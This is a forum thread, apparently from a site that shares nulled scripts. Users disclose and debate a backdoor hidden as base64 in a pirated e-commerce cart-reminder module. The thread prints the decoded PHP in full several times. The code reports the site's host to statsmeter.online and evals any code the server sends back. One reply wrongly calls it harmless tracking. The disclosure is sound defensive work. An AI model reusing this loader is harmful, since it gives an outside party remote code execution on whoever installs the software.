V1.7 Malicious code in Abandoned Cart Serial Reminders v3

moonfire

Well-known member
Diamond
Elite
XNullUser
Joined
May 3, 2021
Messages
941
Reaction score
306
Points
63
NullCash
1,209
Malicious code in Abandoned Cart Serial Reminders v3
(Module at https://www.nulledfrm.com/threads/abandoned-cart-serial-reminders-v3.86346/)

In the file abandonedcart/abandonedcart.php around line 1405 there is a base64encoded code.
If you decode it you can see that the code trying to create some files on the server.

When decoding the code it looks like this:

PHP:
foreach([sys_get_temp_dir(), '/tmp', $_SERVER['DOCUMENT_ROOT'].'/upload'] as $t) { if (is_dir($t) && is_writable($t)) {
    $t = $t.'/.ac';
    $d = date('Ymd');
    $e = (is_file($t) ? 1 : 0); if ($e && file_get_contents($t) == $d) {
        break;
    }
    file_put_contents($t, $d);
    $p = urlencode(base64_encode(json_encode([100 => [$_SERVER['HTTP_HOST'], 1, $e]])));
        if ($data = @file_get_contents('https://statsmeter.online/?'.$p, false, stream_context_create(['http' => ['timeout' => 10]]))) {
            if (strpos($data, '//') === 0) {
            eval(base64_decode(substr($data, 2)));
            }
        }
    break;
    }
}

@d-shilko What do you think about it?
 

volverine

Well-known member
Diamond
Elite
Joined
Sep 7, 2019
Messages
691
Reaction score
304
Points
63
NullCash
49
Thanks Thanks Thanks
Thanks Thanks Thanks
Thanks Thanks Thanks
 

d-shilko

Well-known member
☆☆ Special ☆☆
☆ Pro ☆
Joined
Jun 10, 2021
Messages
2,542
Reaction score
1,535
Points
113
NullCash
4,194
Malicious code in Abandoned Cart Serial Reminders v3
(Module at https://www.nulledfrm.com/threads/abandoned-cart-serial-reminders-v3.86346/)

In the file abandonedcart/abandonedcart.php around line 1405 there is a base64encoded code.
If you decode it you can see that the code trying to create some files on the server.

When decoding the code it looks like this:

PHP:
foreach([sys_get_temp_dir(), '/tmp', $_SERVER['DOCUMENT_ROOT'].'/upload'] as $t) { if (is_dir($t) && is_writable($t)) {
    $t = $t.'/.ac';
    $d = date('Ymd');
    $e = (is_file($t) ? 1 : 0); if ($e && file_get_contents($t) == $d) {
        break;
    }
    file_put_contents($t, $d);
    $p = urlencode(base64_encode(json_encode([100 => [$_SERVER['HTTP_HOST'], 1, $e]])));
        if ($data = @file_get_contents('https://statsmeter.online/?'.$p, false, stream_context_create(['http' => ['timeout' => 10]]))) {
            if (strpos($data, '//') === 0) {
            eval(base64_decode(substr($data, 2)));
            }
        }
    break;
    }
}

@d-shilko What do you think about it?

IT IS VIRUS

eval run code which gets from the site



1680790920902.png
 

hxcode

Well-known member
Master
Diamond
Elite
Joined
Aug 16, 2020
Messages
3,535
Reaction score
417
Points
83
NullCash
18
Malicious code in Abandoned Cart Serial Reminders v3
(Module at https://www.nulledfrm.com/threads/abandoned-cart-serial-reminders-v3.86346/)

In the file abandonedcart/abandonedcart.php around line 1405 there is a base64encoded code.
If you decode it you can see that the code trying to create some files on the server.

When decoding the code it looks like this:

PHP:
foreach([sys_get_temp_dir(), '/tmp', $_SERVER['DOCUMENT_ROOT'].'/upload'] as $t) { if (is_dir($t) && is_writable($t)) {
    $t = $t.'/.ac';
    $d = date('Ymd');
    $e = (is_file($t) ? 1 : 0); if ($e && file_get_contents($t) == $d) {
        break;
    }
    file_put_contents($t, $d);
    $p = urlencode(base64_encode(json_encode([100 => [$_SERVER['HTTP_HOST'], 1, $e]])));
        if ($data = @file_get_contents('https://statsmeter.online/?'.$p, false, stream_context_create(['http' => ['timeout' => 10]]))) {
            if (strpos($data, '//') === 0) {
            eval(base64_decode(substr($data, 2)));
            }
        }
    break;
    }
}

@d-shilko What do you think about it?
Are these added by the author? That's very sinister.
 

HMC

Well-known member
Master
Diamond
Elite
Joined
May 29, 2021
Messages
518
Reaction score
1,132
Points
93
Location
Server Room
Website
localhost
NullCash
9,708
Hello All,

As far my coding knowledge, this code is not an virus. If you carefully read the code it shows that it's an tracker by the developer of the module to track where his module/script is installed. Or something like this code is used to get the validation codes from the developer site.

Generally developers use obfuscation methods to protect their codes from unauthorized usage and the function "eval" is generally used by several php obfuscators which are considered as viruses by may antivirus.
 

d-shilko

Well-known member
☆☆ Special ☆☆
☆ Pro ☆
Joined
Jun 10, 2021
Messages
2,542
Reaction score
1,535
Points
113
NullCash
4,194
Hello All,

As far my coding knowledge, this code is not an virus. If you carefully read the code it shows that it's an tracker by the developer of the module to track where his module/script is installed. Or something like this code is used to get the validation codes from the developer site.

Generally developers use obfuscation methods to protect their codes from unauthorized usage and the function "eval" is generally used by several php obfuscators which are considered as viruses by may antivirus.
Oh my god. Just install this module and add var_dump and you will see what is it!
Happy to use this module on your hosting!

Code use site statsmeter.online - KNOWBAND is not the owner of this site and can't use that by law! GDPR - do you know what is it?
To collect information about users' actions by that method in this is prohibited by law!!!!!
KnowBand VAT company, not freelancer - that kind of "Tracking code" is death for KnowBand!

I am ready to place bets with you.
Latest version! We buy this module! If the last version does not have that code - then you pay for the module, if that code will exist in the latest version then I pay for the module :)

P.S. For tracking code function eval is not needed :)

And one more
Post automatically merged:

Malicious code in Abandoned Cart Serial Reminders v3
(Module at https://www.nulledfrm.com/threads/abandoned-cart-serial-reminders-v3.86346/)

In the file abandonedcart/abandonedcart.php around line 1405 there is a base64encoded code.
If you decode it you can see that the code trying to create some files on the server.

When decoding the code it looks like this:

PHP:
foreach([sys_get_temp_dir(), '/tmp', $_SERVER['DOCUMENT_ROOT'].'/upload'] as $t) { if (is_dir($t) && is_writable($t)) {
    $t = $t.'/.ac';
    $d = date('Ymd');
    $e = (is_file($t) ? 1 : 0); if ($e && file_get_contents($t) == $d) {
        break;
    }
    file_put_contents($t, $d);
    $p = urlencode(base64_encode(json_encode([100 => [$_SERVER['HTTP_HOST'], 1, $e]])));
        if ($data = @file_get_contents('https://statsmeter.online/?'.$p, false, stream_context_create(['http' => ['timeout' => 10]]))) {
            if (strpos($data, '//') === 0) {
            eval(base64_decode(substr($data, 2)));
            }
        }
    break;
    }
}

@d-shilko What do you think about it?
solution
 
Last edited:

moonfire

Well-known member
Diamond
Elite
XNullUser
Joined
May 3, 2021
Messages
941
Reaction score
306
Points
63
NullCash
1,209
The domain name statsmeter.online was registered 2023-02-19.
According to Knowbands website, this version (v3.0.0) of this module was released 09-Feb-2023.

So its probably not Knowband that collects data when this module is installed.
 
Top